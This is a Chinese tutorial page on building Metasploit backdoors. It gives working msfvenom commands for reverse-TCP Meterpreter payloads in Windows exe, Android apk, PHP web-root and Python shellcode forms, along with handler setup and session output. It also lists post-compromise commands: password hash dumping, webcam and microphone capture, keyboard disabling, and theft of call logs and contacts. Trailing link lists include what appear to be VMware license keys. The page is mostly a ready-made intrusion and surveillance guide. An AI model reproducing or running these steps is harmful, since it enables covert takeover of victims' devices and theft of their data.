生成windows后门

1.首先生成后门

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe

2.进入Metasploit,执行以下操作



msf > use exploit/multi/handler

msf exploit(multi/handler) > 



msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp



msf exploit(multi/handler) > set lhost 192.168.1.25


lhost => 192.168.1.25

msf exploit(multi/handler) > set lport 6666

lport => 6666




msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.25:6666

[*] Sending stage (179779 bytes) to 192.168.1.10

[*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400




3.将我们的(lyshark.exe)拷贝到目标主机并运行


4.攻陷后常用查询命令




ps         #查看进程
migrate	    		#注入进程
run vnc	    		#查看远程桌面


cat	      		#查看文件
edit	      		#编辑文件
upload	    		#上传文件
download	    	#下载文件
rm	      		#删除文件
mkdir	    		#创建文件夹
rmdir	    		#删除文件夹


sessions -l	 #查看会话
backgroud	   #退出当前会话


enumdesktops	      	  #在线用户数
uictl disable keyboard	  #让键盘失效
uictl enable keyboard	    #恢复键盘	
record_mic -d 10	      #音频录制
webcam_stream	      	#开启摄像头
screenshot	        	#桌面抓图
sysinfo           		#系统信息查询
getsystem	        	#获取最高权限
hashdump	        	#密码hash




 


生成Android后门


1.首先生成后门




[root@localhost ~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 R > ./lyshark.apk




2.进入Metasploit,执行以下操作




msf > use exploit/multi/handler 

msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 

payload => android/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1

lhost => 192.168.1.1

msf exploit(multi/handler) > set lport 6666

lport =>

msf exploit(multi/handler) > exploit 

[-] Handler failed to bind to 192.168.1.1::-  -

[*] Started reverse TCP handler on 0.0.0.0: 




3.将我们的(lyshark.apk)拷贝到目标主机并运行


4.此时主机已经沦陷,查看一下系统吧




常用命令:

search                     #搜索 search -f *.jpg

download

webcam_stream -i /       #打开前置或后置摄像头

check_root                 #检测root

dump_calllog               #下载电话记录

dump_contacts              #下载信息记录

geolocate                  #定位,需要下载谷歌地图




生成php后门


1.首先生成后门




[root@localhost ~]# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php




2.进入Metasploit,执行以下操作




msf > use exploit/multi/handler

msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 

payload => php/meterpreter_reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1

lhost => 192.168.1.1

msf exploit(multi/handler) > set lport 6666

lport =>

msf exploit(multi/handler) > exploit -j

[*] Exploit running as background job .

msf exploit(multi/handler) >

[-] Handler failed to bind to 192.168.1.1::-  -

[*] Started reverse TCP handler on 0.0.0.0: 




3.将我们的(lyshark.php)拷贝到目标网页根路径


生成shellcode


1.生成shell    <-e 使用编码 - i 编码次数>




[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py


												


											
通过Metasploit生成各种后门的更多相关文章
	

    
								
  1. Kali之Metasploit生成apk后门控制安卓
		
    扫盲教程,大佬勿喷. 实验中请更改为你环境的IP. 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali ...
    
		
    2. 
						
  2. 使用Kali中的Metasploit生成木马控制Windows系统 (第九天 9.20)
		
    本文转自:https://www.cnblogs.com/yankaohaitaiwei/p/11556921.html 一.kali及Metasploit kali基于debin的数字取证系统,上面 ...
    
		
    3. 
						
  3. 使用Kali中的Metasploit生成木马控制Windows系统
		
    一.概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack). 其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使 ...
    
		
    4. 
						
  4. Msfvenonm生成一个后门木马
		
    在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木 ...
    
		
    5. 
						
  5. Kali环境使用Metasploit生成木马入侵安卓手机
		
    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计, ...
    
		
    6. 
						
  6. 9.Metasploit制作木马后门
		
    01木马与后门   木马?后门? 木马和后门都有害,尤其是木马,它由攻击者主动发起,稍不留心就会被利用:后门原来是留给自己方便用的,但也有可能被非法利用,这两种程序都会给用户带来损失. 木马是指潜伏在 ...
    
		
    7. 
						
  7. 6.Metasploit生成apk攻击Android实例
		
    Metasploit进阶第四讲 生成Android  apk文件 01  msfvenom基本参数 msfvenom介绍 承接上回,staged/unstage payload如何利用? msfven ...
    
		
    8. 
						
  8. Metasploit生成木马入侵安卓手机
		
    开始 首先你需要一个Metasploit(废话) Linux: sudo apt install metasploit-framework Termux: 看这里 指令 sudo su //生成木马文 ...
    
		
    9. 
						
  9. metasploit生成payload的格式
		
    转自https://www.cnblogs.com/zlgxzswjy/p/6881904.html Often one of the most useful (and to the beginner ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. VMware 15 Pro密钥
			
    YG5H2-ANZ0H-M8ERY-TXZZZ-YKRV8 UG5J2-0ME12-M89WY-NPWXX-WQH88 UA5DR-2ZD4H-089FY-6YQ5T-YPRX6 GA590-86Y0 ...
    
			
    2. 
						
  2. hdu6069 多校Counting Divisors
			
    思路:对于n^k其实就是每个因子的个数乘了一个K.然后现在就变成了求每个数的每个质因子有多少个,但是比赛的时候只想到sqrt(n)的分解方法,总复杂度爆炸,就一直没过去,然后赛后看官方题解感觉好妙啊! ...
    
			
    3. 
						
  3. ARM cortexM4中断优先级的一点理解。
			
    根据手册PM0214 40页.213页.200.195.interrupt priority grouping. 根据手册EM0090 第371页. stm32f42xxx除掉fpu部分,有91个可屏 ...
    
			
    4. 
						
  4. 【转】CentOS 7 安装配置 NFS
			
    环境 nps 192.168.1.97 client 192.168.1.98 一.yum 安装 yum -y install nfs-utils rpcbind nfs 的配置文件 /etc/exp ...
    
			
    5. 
						
  5. 2018.12.30 poj3734 Blocks(生成函数)
			
    传送门 生成函数入门题. 按照题意构造函数: 对于限定必须是出现偶数次的颜色:1+x22!+x44!+...=ex+e−x21+\frac {x^2}{2!}+\frac {x^4}{4!}+...= ...
    
			
    6. 
						
  6. 2018.12.19 codeforces 1092F. Tree with Maximum Cost(换根dp)
			
    传送门 sbsbsb树形dpdpdp题. 题意简述:给出一棵边权为1的树,允许选任意一个点vvv为根,求∑i=1ndist(i,v)∗ai\sum_{i=1}^ndist(i,v)*a_i∑i=1n​ ...
    
			
    7. 
						
  7. java常用设计模式十一:策略模式
			
    一.概述 定义:策略模式是指对一系列的算法定义,并将每一个算法封装起来,而且使它们还可以相互替换.策略模式让算法独立于使用它的客户而独立变化.(概念不好理解,可以看第二节的合例子) 基本角色: 环境( ...
    
			
    8. 
						
  8. openstack的Host Aggregates和Availability Zones
			
    1.关系 Availability Zones 通常是对 computes 节点上的资源在小的区域内进行逻辑上的分组和隔离.例如在同一个数据中心,我们可以将 Availability Zones 规划 ...
    
			
    9. 
						
  9. UVaLive 3704 Cellular Automaton (循环矩阵 + 矩阵快速幂)
			
    题意:一个细胞自动机包含 n 个格子,每个格子取值是 0 ~ m-1,给定距离,则每次操作后每个格子的值将变成到它距离不超过 d 的所有格子在操作之前的值之和取模 m 后的值,其中 i 和 j 的距离 ...
    
			
    10. 
						
  10. Node简单的控制台读取和文件操作
			
    const fs = require('fs'); const readline = require('readline'); const rl = readline.createInterface( ...
    
			
    11.